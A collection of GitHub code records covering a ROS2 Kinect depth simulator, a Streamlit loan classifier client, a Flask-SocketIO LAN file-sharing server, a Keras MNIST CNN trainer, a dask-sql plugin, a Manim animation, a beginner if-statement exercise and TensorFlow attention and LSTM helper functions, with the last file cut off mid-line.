self.v_beam_angles = np.linspace(self.vfov/2.0, -self.vfov/2.0, self.n_v_scans)\n\n self.converter = None\n self.mapimg = np.array([])\n self.cv_bridge = CvBridge()\n \n\n def connection_init(self):\n self.pub_depth = self.create_publisher(Image, 'camera/depth/image_raw', 10)\n\n self.sub_map = self.create_subscription(OccupancyGrid, 'map', self.set_map, 10)\n self.sub_real_pose = self.create_subscription(Pose, '/real_pose', self.new_pose, 10)\n \n\n def new_pose(self, pose):\n if len(self.mapimg) == 0:\n return None\n\n depth_image = self.max_depth * np.ones((self.n_v_scans, self.n_h_scans), dtype = np.float32)\n x, y = self.converter.metric2pixel(pose.position.x, pose.position.y)\n \n if y < 0 or self.mapimg.shape[0] <= y or x < 0 or self.mapimg.shape[1] <= x:\n depth_image = cv2.resize(depth_image, (self.depth_img_width, self.depth_img_height))\n msg = self.cv_bridge.cv2_to_imgmsg(depth_image)\n self.pub_depth.publish(msg)\n return None\n \n quat = (pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w)\n roll, pitch, yaw = euler_from_quaternion(quat)\n\n robot_pose = (x, y, yaw)\n pixel_lidar, distance_sensor = build_pixel_rangefinder(self.mapimg,\n robot_pose,\n self.hfov,\n self.n_h_scans,\n self.view_depth_pix)\n\n distance_sensor = self.map_resolution * np.array(distance_sensor) # [m]\n distance_sensor = distance_sensor[::-1] # reverse: from left to right\n \n for c, d in enumerate(distance_sensor):\n d = d*np.cos(self.h_beam_angles[c]) # project beam into the robot plane\n\n ceiling_angle = np.arctan2(self.wall_height - self.kinect_height, d)\n ceiling_limit_index = -1\n \n if ceiling_angle < self.vfov/2.0:\n ceiling_indices = np.where(self.v_beam_angles > ceiling_angle)[0]\n depth_image[ceiling_indices,c] = self.max_depth\n ceiling_limit_index = ceiling_indices.max()\n\n ground_angle = np.arctan2(self.kinect_height, d)\n ground_limit_index = self.n_v_scans\n \n if ground_angle < self.vfov/2.0:\n ground_indices = np.where(self.v_beam_angles < -ground_angle)[0]\n for i in ground_indices:\n ground_d = self.kinect_height / np.sin(abs(self.v_beam_angles[i]))\n depth_image[i,c] = ground_d if ground_d >= self.min_valid_distance else float('nan')\n ground_limit_index = ground_indices.min()\n\n if ceiling_limit_index < 0:\n depth_image[0:ground_limit_index,c] = d if d >= self.min_valid_distance else float('nan')\n \n else:\n depth_image[ceiling_limit_index+1:ground_limit_index,c] = d if d >= self.min_valid_distance else float('nan')\n \n depth_image = cv2.resize(depth_image, (self.depth_img_width, self.depth_img_height))\n\n msg = self.cv_bridge.cv2_to_imgmsg(depth_image) #, encoding = '32FC1')\n self.pub_depth.publish(msg)\n\n def set_map(self, occupancy_grid):\n width = occupancy_grid.info.width\n height = occupancy_grid.info.height\n self.map_resolution = occupancy_grid.info.resolution\n self.mapimg = 100 - np.array(occupancy_grid.data).reshape((height, width))\n self.converter = CoordinateConverter(0.0, self.mapimg.shape[0] * self.map_resolution, self.map_resolution)\n self.view_depth_pix = self.view_depth / self.map_resolution # [pix]\n\n\ndef main(args=None):\n rclpy.init(args=args)\n kinect_simulator = KinectSimulator()\n rclpy.spin(kinect_simulator)\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"MonkyDCristian/very_simple_robot_simulator2","sub_path":"very_simple_robot_simulator2/kinect_simulator.py","file_name":"kinect_simulator.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13011336800","text":"import streamlit\nimport requests\nimport json\n\ndef run():\n streamlit.title(\"Loan Classifier\")\n\n Gender = streamlit.selectbox(\"Gender\", ['Male', 'Female'])\n Education = streamlit.selectbox(\"Education\", ['Graduate', 'Not Graduate'])\n Married = streamlit.selectbox(\"Married\", ['Yes', 'No'])\n Self_Employed = streamlit.selectbox(\"Employment\", ['Yes', 'No'])\n Property_Area = streamlit.selectbox(\"Property Area\", ['Urban', 'Rural', 'Semiurban'])\n\n data = {\n 'Gender': Gender,\n 'Education': Education,\n 'Married': Married,\n 'Self_Employed': Self_Employed,\n 'Property_Area': Property_Area,\n }\n\n if streamlit.button(\"Predict\"):\n response = requests.post(\"http://127.0.0.1:8000/predict\", json=data)\n prediction = response.text\n streamlit.success(f\"The prediction from model: {prediction}\")\n\n\nif __name__ == '__main__':\n # by default it will run at 8501 port\n run()","repo_name":"komalparakh05/The-Vectors","sub_path":"Python_notebooks/.ipynb_checkpoints/API_Streamlit_app.py","file_name":"API_Streamlit_app.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16755733323","text":"from flask import Flask, render_template, request, send_file\nfrom flask_socketio import SocketIO, emit\nfrom flask_cors import CORS\nfrom backgroundend.models import Models\nfrom engineio.async_drivers import eventlet\nimport sys\nimport os\n\n\ndef source_path(relative_path):\n # 是否Bundle Resource\n if getattr(sys, 'frozen', False):\n base_path = sys._MEIPASS\n else:\n base_path = os.path.abspath(\"..\")\n return os.path.join(base_path, relative_path)\n\n\nis_share = True\nmodels = Models()\ntemplate_folder = source_path('dist')\nstatic_folder = source_path('dist\\\\assets')\napp = Flask(__name__, template_folder=template_folder, static_folder=static_folder)\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app, cors_allowed_origins=\"*\", async_mode='eventlet')\ncors = CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\n\n\n@app.route('/')\ndef index(): # 定义根目录处理器\n return render_template(\"index.html\")\n\n\n@app.route('/download')\ndef download():\n _id = request.args.get('id', '')\n dir_info = models.get_file_dir(_id)\n print(dir_info)\n return send_file(dir_info[\"dir\"])\n\n\n@socketio.on('notice_web', namespace='/ws_sharing')\ndef select_file_result():\n if not is_share:\n result = []\n else:\n result = models.get_now_data()\n emit('select_file_result', {\"data\": result}, namespace=\"/ws_sharing\")\n\n\n@socketio.on('change_share', namespace='/ws_sharing')\ndef change_share_status(val):\n print(\"change_share_status: \", val)\n global is_share\n is_share = val\n emit(\"change_share\", {'data': is_share}, broadcast=True)\n\n\n# update_file_status\n@socketio.on('update_file_status', namespace='/ws_sharing')\ndef update_file_status(kwarg):\n print(type(kwarg), kwarg)\n _id, is_del = kwarg['id'], kwarg['is_del']\n if is_del:\n models.thread_wrapper_run(models.del_file_db, {\"_id\": _id})\n else:\n models.thread_wrapper_run(models.update_file_status, {\"_id\": _id})\n # models.update_file_status(_id)\n\n@socketio.on('connect', namespace='/ws_sharing')\ndef test_connect(message):\n if is_share:\n reset_data = models.init_front_data()\n else:\n reset_data = []\n print(reset_data)\n emit('ws_connect', {\"data\": reset_data})\n\n\n@socketio.on('disconnect', namespace='/ws_sharing')\ndef test_disconnect():\n print('Client disconnected')\n\n\ndef server(is_dev):\n socketio.run(app, host=\"0.0.0.0\", port=\"5001\") # 启动服务\n\n\nif __name__ == '__main__':\n # socketio.init_app(app, async_mode=\"eventlet\", host=\"0.0.0.0\", port=\"5001\")\n socketio.run(app, host=\"0.0.0.0\", port=\"5001\") # 启动服务\n","repo_name":"mygod123982/lan_sharing","sub_path":"backgroundend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17792185036","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 15 16:44:05 2019\r\n\r\n@author: AZEST-2019-07\r\n\"\"\"\r\n\r\nimport os \r\nimport time\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras.models import *\r\nfrom tensorflow.keras.metrics import *\r\nfrom tensorflow.keras.layers import *\r\nfrom tensorflow.keras.layers import GaussianDropout\r\nfrom tensorflow.keras.optimizers import *\r\nfrom tensorflow.keras.callbacks import ModelCheckpoint, LearningRateScheduler, TensorBoard\r\nfrom tensorflow.keras import backend as K\r\nfrom tensorflow.keras.utils import to_categorical\r\nfrom sklearn.metrics import f1_score, confusion_matrix, precision_score, recall_score, jaccard_score\r\nfrom keras.datasets import mnist\r\nfrom tensorflow.keras.callbacks import *\r\nimport sys\r\nsys.path.append('C:\\\\Users\\\\AZEST-2019-07\\\\Desktop\\\\pyfiles')\r\nfrom mnistprep import img_train,label_train,img_test,label_test\r\n\r\nbatch_size = 16\r\nnum_classes = 21\r\nepochs = 1\r\n#data_augmentation = True\r\n#num_predictions = 20\r\n#save_dir = os.path.join(os.getcwd(), 'saved_models')\r\n#model_name = 'keras_cifar10_trained_model.h5'\r\n\r\ndef load():\r\n x_train, y_train, x_test, y_test = img_train,label_train,img_test,label_test\r\n \r\n y_train = keras.utils.to_categorical(y_train, num_classes)\r\n y_test = keras.utils.to_categorical(y_test, num_classes)\r\n indices = np.random.permutation(np.arange(x_train.shape[0]))\r\n \r\n \r\n x_train = x_train[indices]\r\n y_train = y_train[indices]\r\n \r\n print('x_train shape:', x_train.shape)\r\n print(x_train.shape[0], 'train samples')\r\n print(x_test.shape[0], 'test samples')\r\n return x_train,y_train,x_test,y_test\r\n\r\nx_train,y_train,x_test,y_test = load()\r\n\r\n\r\ndef ioc_loss(y_true,y_pred):\r\n def jaccard_distance(y_true, y_pred, smooth=100):\r\n \"\"\" Calculates mean of Jaccard distance as a loss function \"\"\"\r\n intersection = K.sum(K.abs(y_true * y_pred))\r\n sum_ = K.sum(K.abs(y_true) + K.abs(y_pred))\r\n jac = (intersection + smooth) / (sum_ - intersection + smooth)\r\n jd = (1 - jac) * smooth\r\n return tf.reduce_mean(jd)\r\n return K.mean(-1*y_true*K.log(y_pred+1/(2^20))) + K.log(jaccard_distance(y_true,y_pred)+1/(2^20))\r\n\r\ndef f1(y_true, y_pred):\r\n def recall(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\r\n recall = true_positives / (possible_positives + K.epsilon())\r\n return recall\r\n\r\n def precision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision\r\n precision = precision(y_true, y_pred)\r\n recall = recall(y_true, y_pred)\r\n \r\n return 2*((precision*recall)/(precision+recall+K.epsilon()))\r\n\r\ndef nnBlock(input_shape):\r\n \r\n model = Sequential()\r\n model.add(InputLayer(input_shape=input_shape))\r\n model.add(Conv2D(32, (3, 3), padding='same'))\r\n model.add(Activation('relu'))\r\n model.add(Conv2D(32, (3, 3)))\r\n model.add(Activation('relu'))\r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.25))\r\n \r\n model.add(Conv2D(64, (3, 3), padding='same'))\r\n model.add(Activation('relu'))\r\n model.add(Conv2D(64, (3, 3)))\r\n model.add(Activation('relu'))\r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.25))\r\n \r\n model.add(Flatten())\r\n model.add(Dense(168))\r\n model.add(Activation('relu'))\r\n model.add(Dropout(0.25))\r\n model.add(Dense(num_classes))\r\n model.add(Activation('softmax'))\r\n \r\n return model\r\n\r\ndef save_model(model): \r\n json_string = model.to_json()\r\n open('model.json', 'w').write(json_string)\r\n \r\ndef load_model2():\r\n model = load_model('C:\\\\Users\\\\AZEST-2019-07\\\\Desktop\\\\pyfiles\\\\mymodel.h5')\r\n model.load_weights('C:\\\\Users\\\\AZEST-2019-07\\\\Desktop\\\\pyfiles\\\\best_weights.hdf5')\r\n opt = keras.optimizers.Adam(lr=0.0002, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)\r\n model.compile(loss='categorical_crossentropy',\r\n optimizer=opt,\r\n metrics=['accuracy'])\r\n return model\r\n\r\ndef train(x_train,y_train,x_test,y_test):\r\n\r\n tensorboard = TensorBoard(log_dir=\"C:\\\\Users\\\\AZEST-2019-07\\\\Desktop\\\\pyfiles\\\\logs\\\\tb1\")\r\n \r\n x_train = x_train.astype('float32')\r\n x_test = x_test.astype('float32')\r\n x_train /= 255\r\n x_test /= 255\r\n# x_train = np.reshape(x_train,(x_train.shape+(1,)))\r\n# x_test = np.reshape(x_test,(x_test.shape+(1,)))\r\n \r\n print(' test... \\n')\r\n print(x_train.shape,x_test.shape,y_train.shape,y_test.shape)\r\n \r\n model = nnBlock((28,28,1))\r\n model.load_weights('C:\\\\Users\\\\AZEST-2019-07\\\\Desktop\\\\pyfiles\\\\best_weights2.hdf5')\r\n print(model.summary())\r\n \r\n opt = keras.optimizers.Adam(lr=0.0002, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)\r\n \r\n model.compile(loss='categorical_crossentropy',\r\n optimizer=opt,\r\n metrics=['accuracy'])\r\n \r\n checkpointer = ModelCheckpoint(filepath=\"C:\\\\Users\\\\AZEST-2019-07\\\\Desktop\\\\pyfiles\\\\best_weights.hdf5\", \r\n monitor = 'val_accuracy',\r\n verbose=1, \r\n save_best_only=True)\r\n \r\n history = model.fit(x_train, y_train,batch_size=batch_size,\r\n epochs=epochs,\r\n validation_data=(x_test, y_test),\r\n shuffle=True,callbacks=[tensorboard,checkpointer])\r\n save_model(model)\r\n model.save_weights('C:\\\\Users\\\\AZEST-2019-07\\\\Desktop\\\\pyfiles\\\\best_weights.hdf5')\r\n model.save('C:\\\\Users\\\\AZEST-2019-07\\\\Desktop\\\\pyfiles\\\\mymodel.h5')\r\n\r\ntrain(x_train,y_train,x_test,y_test)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"barathksd/Thyroid-Segmentation","sub_path":"cnndemo.py","file_name":"cnndemo.py","file_ext":"py","file_size_in_byte":5971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32181562535","text":"from typing import TYPE_CHECKING, Any, Union\n\nimport dask.dataframe as dd\n\nfrom dask_sql.datacontainer import DataContainer\nfrom dask_sql.physical.rex import RexConverter\nfrom dask_sql.physical.rex.base import BaseRexPlugin\n\nif TYPE_CHECKING:\n import dask_sql\n from dask_sql._datafusion_lib import Expression, LogicalPlan\n\n\nclass RexAliasPlugin(BaseRexPlugin):\n \"\"\"\n A RexAliasPlugin is an expression, which references a Subquery.\n This plugin is thin on logic, however keeping with previous patterns\n we use the plugin approach instead of placing the logic inline\n \"\"\"\n\n class_name = \"RexAlias\"\n\n def convert(\n self,\n rel: \"LogicalPlan\",\n rex: \"Expression\",\n dc: DataContainer,\n context: \"dask_sql.Context\",\n ) -> Union[dd.Series, Any]:\n # extract the operands; there should only be a single underlying Expression\n operands = rex.getOperands()\n assert len(operands) == 1\n\n sub_rex = operands[0]\n\n value = RexConverter.convert(rel, sub_rex, dc, context=context)\n\n if isinstance(value, DataContainer):\n return value.df\n\n return value\n","repo_name":"dask-contrib/dask-sql","sub_path":"dask_sql/physical/rex/core/alias.py","file_name":"alias.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":336,"dataset":"github-code","pt":"21"} +{"seq_id":"34158836278","text":"from manim import *\n\nclass ImageAnimation(Scene):\n def construct(self):\n # Cargar una imagen PNG\n image = ImageMobject(\"mapa_de_calor.png\") \n\n \n image.scale(1.5)\n\n \n image.move_to(ORIGIN)\n\n \n self.play(FadeIn(image))\n\n\n self.wait(10)\n\n self.play(FadeOut(image))\n","repo_name":"MartinPaGarcia/Developer_Personal_Projects","sub_path":"Python/Manim/animacion_mapa.py","file_name":"animacion_mapa.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20346778416","text":"#网吧测试年龄\n# 输入用户年龄\n# age = int(input(\"其输入你的年龄:\" ))\n# #判断是否满18岁(>=)\n# if age >= 18:\n# # 如果满18岁,就允许进网吧嗨皮\n# print(\"允许进网吧嗨皮 \")\n# #如果没满18岁,就提示回家写作业\n# else:\n# print(\"回家写作业吧!\")\n\n\n#练习2,if和逻辑运算符应用\n#定义一个整数变量age,编写代码判断年龄是否正确\nage = int(input(\"输入您的年龄\"))\n# 要求人的年龄在0—120岁之间\n\"\"\"\n先分步判断:\n先定一个数 1000\n选逻辑运算符\nage >= 0 or age <=120\nage >=0 and age <=120\n\"\"\"\nif age >=0 and age <=120:\n print(\"年龄正确\")\nelse:\n print(\"年龄不正确\")\n\n","repo_name":"lianghanwu1999/Python","sub_path":"python基础部分/python顺序输入训练/if语句_年龄判断练习.py","file_name":"if语句_年龄判断练习.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74901545973","text":"import tensorflow as tf\nfrom tensorflow.python.ops import nn_ops\n\ndef my_lstm_layer(input_reps, lstm_dim, scope_name=None, reuse=False, is_training=True, dropout_rate=0.2):\n '''\n :param inputs: [batch_size, seq_len, feature_dim]\n :param lstm_dim:\n :param scope_name:\n :param reuse:\n :param is_training:\n :param dropout_rate:\n :return:\n '''\n with tf.variable_scope(scope_name, reuse=reuse):\n inputs = tf.transpose(input_reps, [1, 0, 2])\n inputs = dropout_layer(inputs, dropout_rate, is_training=is_training)\n lstm = tf.contrib.cudnn_rnn.CudnnLSTM(1, lstm_dim, direction=\"bidirectional\",\n name=\"{}_cudnn_bi_lstm\".format(scope_name), dropout=0)\n # name=\"{}_cudnn_bi_lstm\".format(scope_name), dropout=dropout_rate if is_training else 0)\n outputs, _ = lstm(inputs)\n outputs = tf.transpose(outputs, [1, 0, 2])\n f_rep = outputs[:, :, 0:lstm_dim]\n b_rep = outputs[:, :, lstm_dim:2*lstm_dim]\n return (f_rep,b_rep, outputs)\n\ndef dropout_layer(input_reps, dropout_rate, is_training=True):\n if is_training:\n output_repr = tf.nn.dropout(input_reps, (1 - dropout_rate))\n else:\n output_repr = input_reps\n return output_repr\n\ndef cosine_distance(y1,y2, cosine_norm=True, eps=1e-6):\n # cosine_norm = True\n # y1 [....,a, 1, d]\n # y2 [....,1, b, d]\n cosine_numerator = tf.reduce_sum(tf.multiply(y1, y2), axis=-1)\n if not cosine_norm:\n return tf.tanh(cosine_numerator)\n y1_norm = tf.sqrt(tf.maximum(tf.reduce_sum(tf.square(y1), axis=-1), eps))\n y2_norm = tf.sqrt(tf.maximum(tf.reduce_sum(tf.square(y2), axis=-1), eps))\n return cosine_numerator / y1_norm / y2_norm\n\ndef euclidean_distance(y1, y2, eps=1e-6):\n distance = tf.sqrt(tf.maximum(tf.reduce_sum(tf.square(y1 - y2), axis=-1), eps))\n return distance\n\ndef softmax_with_mask(values, mask):\n # e_x = np.exp(x - np.max(x))\n # return e_x / e_x.sum()\n e_x = tf.exp(values - tf.expand_dims(tf.reduce_max(values, axis=-1), axis=-1))\n # e_x *= tf.expand_dims(mask, axis=-1)\n e_x += 1e-6\n e_x *= mask\n return e_x / (tf.expand_dims(tf.reduce_sum(e_x, axis=-1), axis=-1) + 1e-6)\n\ndef cross_entropy(logits, truth, mask=None):\n # logits: [batch_size, passage_len]\n # truth: [batch_size, passage_len]\n # mask: [batch_size, passage_len]\n if mask is not None: logits = tf.multiply(logits, mask)\n xdev = tf.subtract(logits, tf.expand_dims(tf.reduce_max(logits, 1), -1))\n log_predictions = tf.subtract(xdev, tf.expand_dims(tf.log(tf.reduce_sum(tf.exp(xdev),-1)),-1))\n result = tf.multiply(truth, log_predictions) # [batch_size, passage_len]\n if mask is not None: result = tf.multiply(result, mask) # [batch_size, passage_len]\n return tf.multiply(-1.0,tf.reduce_sum(result, -1)) # [batch_size]\n\ndef projection_layer(in_val, input_size, output_size, activation_func=tf.tanh, scope=None):\n # in_val: [batch_size, passage_len, dim]\n input_shape = tf.shape(in_val)\n batch_size = input_shape[0]\n passage_len = input_shape[1]\n# feat_dim = input_shape[2]\n in_val = tf.reshape(in_val, [batch_size * passage_len, input_size])\n with tf.variable_scope(scope or \"projection_layer\"):\n full_w = tf.get_variable(\"full_w\", [input_size, output_size], dtype=tf.float32)\n full_b = tf.get_variable(\"full_b\", [output_size], dtype=tf.float32)\n outputs = activation_func(tf.nn.xw_plus_b(in_val, full_w, full_b))\n outputs = tf.reshape(outputs, [batch_size, passage_len, output_size])\n return outputs # [batch_size, passage_len, output_size]\n\ndef highway_layer(in_val, output_size, activation_func=tf.tanh, scope=None):\n # in_val: [batch_size, passage_len, dim]\n input_shape = tf.shape(in_val)\n batch_size = input_shape[0]\n passage_len = input_shape[1]\n# feat_dim = input_shape[2]\n in_val = tf.reshape(in_val, [batch_size * passage_len, output_size])\n with tf.variable_scope(scope or \"highway_layer\"):\n highway_w = tf.get_variable(\"highway_w\", [output_size, output_size], dtype=tf.float32)\n highway_b = tf.get_variable(\"highway_b\", [output_size], dtype=tf.float32)\n full_w = tf.get_variable(\"full_w\", [output_size, output_size], dtype=tf.float32)\n full_b = tf.get_variable(\"full_b\", [output_size], dtype=tf.float32)\n trans = activation_func(tf.nn.xw_plus_b(in_val, full_w, full_b))\n gate = tf.nn.sigmoid(tf.nn.xw_plus_b(in_val, highway_w, highway_b))\n outputs = tf.add(tf.multiply(trans, gate), tf.multiply(in_val, tf.subtract(1.0, gate)), \"y\")\n outputs = tf.reshape(outputs, [batch_size, passage_len, output_size])\n return outputs\n\ndef multi_highway_layer(in_val, output_size, num_layers, activation_func=tf.tanh, scope_name=None, reuse=False):\n with tf.variable_scope(scope_name, reuse=reuse):\n for i in xrange(num_layers):\n cur_scope_name = scope_name + \"-{}\".format(i)\n in_val = highway_layer(in_val, output_size,activation_func=activation_func, scope=cur_scope_name)\n return in_val\n\ndef collect_representation2(representation, positions):\n '''\n :param representation: [batch_size, passsage_length, dim]\n :param positions: [batch_size, num_positions]\n :return:\n '''\n def singel_instance(x):\n # x[0]: [passage_length, dim]\n # x[1]: [num_positions]\n return tf.gather(x[0], x[1])\n elems = (representation, positions)\n return tf.map_fn(singel_instance, elems, dtype=tf.float32) # [batch_size, num_positions, dim]\n\ndef collect_representation(representation, positions):\n # representation: [batch_size, node_num, feature_dim]\n # positions: [batch_size, neigh_num]\n return collect_probs(representation, positions)\n\n\ndef collect_final_step_of_lstm(lstm_representation, lengths):\n # lstm_representation: [batch_size, passsage_length, dim]\n # lengths: [batch_size]\n lengths = tf.maximum(lengths, tf.zeros_like(lengths, dtype=tf.int32))\n\n batch_size = tf.shape(lengths)[0]\n batch_nums = tf.range(0, limit=batch_size) # shape (batch_size)\n indices = tf.stack((batch_nums, lengths), axis=1) # shape (batch_size, 2)\n result = tf.gather_nd(lstm_representation, indices, name='last-forwar-lstm')\n return result # [batch_size, dim]\n\ndef collect_probs(probs, positions):\n # probs [batch_size, chunks_size]\n # positions [batch_size, pair_size]\n batch_size = tf.shape(probs)[0]\n pair_size = tf.shape(positions)[1]\n batch_nums = tf.range(0, limit=batch_size) # shape (batch_size)\n batch_nums = tf.reshape(batch_nums, shape=[-1, 1]) # [batch_size, 1]\n batch_nums = tf.tile(batch_nums, multiples=[1, pair_size]) # [batch_size, pair_size]\n\n indices = tf.stack((batch_nums, positions), axis=2) # shape (batch_size, pair_size, 2)\n pair_probs = tf.gather_nd(probs, indices)\n # pair_probs = tf.reshape(pair_probs, shape=[batch_size, pair_size])\n return pair_probs\n\ndef calcuate_attention(in_value_1, in_value_2, feature_dim1, feature_dim2, scope_name='att',\n att_type='symmetric', att_dim=20, remove_diagnoal=False, mask1=None, mask2=None,\n is_training=False, dropout_rate=0.2, cosine_attention_scale=200):\n input_shape = tf.shape(in_value_1)\n batch_size = input_shape[0]\n len_1 = input_shape[1]\n len_2 = tf.shape(in_value_2)[1]\n\n in_value_1 = dropout_layer(in_value_1, dropout_rate, is_training=is_training)\n in_value_2 = dropout_layer(in_value_2, dropout_rate, is_training=is_training)\n with tf.variable_scope(scope_name):\n if att_type != 'cosine' and att_type != 'dot':\n # calculate attention ==> a: [batch_size, len_1, len_2]\n atten_w1 = tf.get_variable(\"atten_w1\", [feature_dim1, att_dim], dtype=tf.float32)\n atten_value_1 = tf.matmul(tf.reshape(in_value_1, [batch_size * len_1, feature_dim1]), atten_w1) # [batch_size*len_1, feature_dim]\n\n if feature_dim1 == feature_dim2: atten_w2 = atten_w1\n else: atten_w2 = tf.get_variable(\"atten_w2\", [feature_dim2, att_dim], dtype=tf.float32)\n # atten_w2 = tf.get_variable(\"atten_w2\", [feature_dim2, att_dim], dtype=tf.float32)\n atten_value_2 = tf.matmul(tf.reshape(in_value_2, [batch_size * len_2, feature_dim2]), atten_w2) # [batch_size*len_2, feature_dim]\n\n if att_type == 'additive':\n atten_value_1 = tf.reshape(atten_value_1, [batch_size, len_1, att_dim])\n atten_value_2 = tf.reshape(atten_value_2, [batch_size, len_2, att_dim])\n\n atten_b = tf.get_variable(\"atten_b\", [att_dim], dtype=tf.float32)\n atten_v = tf.get_variable(\"atten_v\", [1, att_dim], dtype=tf.float32)\n atten_value_1 = tf.expand_dims(atten_value_1, axis=2, name=\"atten_value_1\") # [batch_size, len_1, 'x', feature_dim]\n atten_value_2 = tf.expand_dims(atten_value_2, axis=1, name=\"atten_value_2\") # [batch_size, 'x', len_2, feature_dim]\n atten_value = atten_value_1 + atten_value_2 # + tf.expand_dims(tf.expand_dims(tf.expand_dims(atten_b, axis=0), axis=0), axis=0)\n atten_value = nn_ops.bias_add(atten_value, atten_b)\n atten_value = tf.tanh(atten_value) # [batch_size, len_1, len_2, feature_dim]\n atten_value = tf.reshape(atten_value, [-1, att_dim]) * atten_v # tf.expand_dims(atten_v, axis=0) # [batch_size*len_1*len_2, feature_dim]\n atten_value = tf.reduce_sum(atten_value, axis=-1)\n atten_value = tf.reshape(atten_value, [batch_size, len_1, len_2])\n elif att_type == 'symmetric':\n atten_value_1 = tf.nn.relu(atten_value_1) # [batch_size*len1, att_dim]\n atten_value_2 = tf.nn.relu(atten_value_2) # [batch_size*len2, att_dim]\n D_in = tf.get_variable(\"diagonal_{}\".format(scope_name), [att_dim], dtype=tf.float32) # att_dim\n D = D_in * tf.diag(tf.ones([att_dim], tf.float32), name='diagonal') # att_dim xatt_dim\n atten_value_1 = tf.matmul(atten_value_1, D) # [batch_size*len1, att_dim]\n atten_value_1 = tf.reshape(atten_value_1, [batch_size, len_1, att_dim])\n atten_value_2 = tf.reshape(atten_value_2, [batch_size, len_2, att_dim])\n atten_value = tf.matmul(atten_value_1, atten_value_2, transpose_b=True) # [batch_size, len_1, len_2]\n elif att_type == 'cosine':\n atten_value = cal_relevancy_matrix(in_value_2, in_value_1)\n atten_value = atten_value * cosine_attention_scale\n elif att_type == 'dot':\n atten_value = tf.matmul(in_value_1, in_value_2, transpose_b=True)\n else:\n atten_value_1 = tf.tanh(atten_value_1)\n # atten_value_1 = tf.nn.relu(atten_value_1)\n atten_value_2 = tf.tanh(atten_value_2)\n # atten_value_2 = tf.nn.relu(atten_value_2)\n diagnoal_params = tf.get_variable(\"diagonal_params\", [att_dim], dtype=tf.float32)\n atten_value_1 = atten_value_1 * tf.expand_dims(diagnoal_params, axis=0)\n atten_value_1 = tf.reshape(atten_value_1, [batch_size, len_1, att_dim])\n atten_value_2 = tf.reshape(atten_value_2, [batch_size, len_2, att_dim])\n atten_value = tf.matmul(atten_value_1, atten_value_2, transpose_b=True) # [batch_size, len_1, len_2]\n\n if remove_diagnoal:\n diagnoal = tf.ones([len_1], tf.float32) # [len1]\n diagnoal = 1.0 - tf.diag(diagnoal) # [len1, len1]\n diagnoal = tf.expand_dims(diagnoal, axis=0) # ['x', len1, len1]\n atten_value = atten_value * diagnoal\n if mask1 is not None: atten_value = tf.multiply(atten_value, tf.expand_dims(mask1, axis=-1))\n if mask2 is not None: atten_value = tf.multiply(atten_value, tf.expand_dims(mask2, axis=1))\n # normalize\n # atten_value = tf.nn.softmax(atten_value, name='atten_value') # [batch_size, len_1, len_2]\n atten_value = softmax_with_mask(atten_value, tf.expand_dims(mask2, axis=1))\n if remove_diagnoal: atten_value = atten_value * diagnoal\n if mask1 is not None: atten_value = tf.multiply(atten_value, tf.expand_dims(mask1, axis=-1))\n if mask2 is not None: atten_value = tf.multiply(atten_value, tf.expand_dims(mask2, axis=1))\n\n return atten_value\n\n\ndef calcuate_attention_bak(in_value_1, in_value_2, feature_dim1, feature_dim2, scope_name='att',\n att_type='symmetric', att_dim=20, remove_diagnoal=False, mask1=None, mask2=None, is_training=False, dropout_rate=0.2,\n cosine_attention_scale=200):\n input_shape = tf.shape(in_value_1)\n batch_size = input_shape[0]\n len_1 = input_shape[1]\n len_2 = tf.shape(in_value_2)[1]\n\n in_value_1 = dropout_layer(in_value_1, dropout_rate, is_training=is_training)\n in_value_2 = dropout_layer(in_value_2, dropout_rate, is_training=is_training)\n with tf.variable_scope(scope_name):\n # if att_type != 'cosine':\n # calculate attention ==> a: [batch_size, len_1, len_2]\n atten_w1 = tf.get_variable(\"atten_w1\", [feature_dim1, att_dim], dtype=tf.float32)\n atten_value_1 = tf.matmul(tf.reshape(in_value_1, [batch_size * len_1, feature_dim1]), atten_w1) # [batch_size*len_1, feature_dim]\n\n if feature_dim1 == feature_dim2: atten_w2 = atten_w1\n else: atten_w2 = tf.get_variable(\"atten_w2\", [feature_dim2, att_dim], dtype=tf.float32)\n # atten_w2 = tf.get_variable(\"atten_w2\", [feature_dim2, att_dim], dtype=tf.float32)\n atten_value_2 = tf.matmul(tf.reshape(in_value_2, [batch_size * len_2, feature_dim2]), atten_w2) # [batch_size*len_2, feature_dim]\n\n if att_type == 'additive':\n atten_value_1 = tf.reshape(atten_value_1, [batch_size, len_1, att_dim])\n atten_value_2 = tf.reshape(atten_value_2, 